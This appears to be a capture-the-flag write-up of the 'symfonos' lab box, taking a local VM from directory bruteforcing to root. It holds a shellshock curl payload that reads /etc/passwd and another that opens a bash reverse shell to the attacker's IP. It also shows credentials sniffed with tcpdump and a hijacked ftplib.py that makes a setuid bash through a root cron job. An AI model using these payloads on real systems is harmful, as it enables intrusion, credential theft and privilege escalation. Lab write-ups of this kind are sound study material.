DifficultyRelease DateAuthor
Intermediate7 Apr 2020Zayotic

Summary

In this box, we need to perform some directory bruteforce then use shellshock vulnerability to get our first shell. We then sniff local traffic using tcpdump and get credentials for the next user who has permissions to write python2.7 lib directory. Using those write permissions we hijack a library that is imported in a script that is executed by root in a cron job. We create a suid bash binary that we use to get a root shell.

Reconnaissance

Nmap

Nmap scan report for 192.168.191.130
Host is up (0.00025s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5b
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA)
|   256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA)
|_  256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

HTTP (80)

Visiting the IP on the browser, all we get is a picture.

symfonos

Viewing the source doesn’t reveal much.

symfonos

Performing a recursive directory bruteforce using ffuf with recursion enabled we get several directories.

ffuf -ic -c -u http://192.168.191.130/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -recursion | tee ffuf.out.recurse
symfonos

Going to the research endpoint, there’s information about the Underworld and Greek mythology.

symfonos

Some of the words look similar to the directories we discovered, so let’s create a wordlist which maybe helpful later.

cewl http://192.168.191.130/gate/cerberus/tartarus/research -w words.txt

The current directories we have discovered don’t have much in them. At this point I was stuck a bit, after looking at some writeups I realized that sometimes valid directories show when you have a trailing slash at the end. So I ran ffuf again with a trailing slash.

ffuf -ic -c -u http://192.168.191.130/FUZZ/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt | tee ffuf.rootdir
symfonos

With this idea, cgi-bin directory is discovered. This is a nice directory bruteforce tip I’ll use going forward. The presence of cgi-bin could potentially mean we can have a shellshock vulnerability.

Running another bruteforce using the wordlist I created earlier didn’t work. I then thought to get a lowercase version of the words and try it.

cewl --lowercase http://192.168.191.130/gate/cerberus/tartarus/research -w words2.txt

ffuf -ic -c -u http://192.168.191.130/cgi-bin/FUZZ -w words2.txt
symfonos

With the lowercase wordlist, we get underworld.

To verify the shellshock vulnerability, we can send this request.

curl -A "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.191.130/cgi-bin/underworld
symfonos

Shell as cerberus

After verifying this vulnerability, we can get a reverse shell.

curl -A "() { :; }; echo; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.191.1/9000 0>&1 &'" http://192.168.191.130/cgi-bin/underworld
symfonos

On running id we notice that cerberus is part of pcap group. To figure out what is unique about this group I used the find command.

find / -group pcap -ls 2>/dev/null
symfonos

This reveals we can run tcpdump, therefore we can sniff network traffic.

Before sniffing traffic, I used pspy to check for cron jobs and other commands being executed.

symfonos

With this I was able to pick up a cronjob that runs as root. Since ftpclient.py is being executed, I’ll sniff ftp traffic which isn’t typically encrypted.

tcpdump port 21 -n -i lo -A
symfonos

From the tcpdump traffic we get new credentials, hades : PTpZTfU4vxgzvRBE.

Privilege Escalation

Using the credentials we login to ssh as hades, running id reveals hades is in gods group.

symfonos

Running find again reveals we have write permissions to /usr/lib/python2.7 folder.

find / -group gods -ls 2>/dev/null
symfonos

Based on the earlier output of pspy, we saw a cronjob that was running as root and python2.7 was being executed. Therefore we can hijack any imports in that ftpclient.py script.

symfonos

Since ftplib is imported, we’ll replace ftplib.py with this script

import os

os.system('cp /bin/bash /tmp/bash')
os.system('chmod +s /tmp/bash')
symfonos

This will create a setuid bash binary in /tmp. Which can use to gain root privileges.

symfonos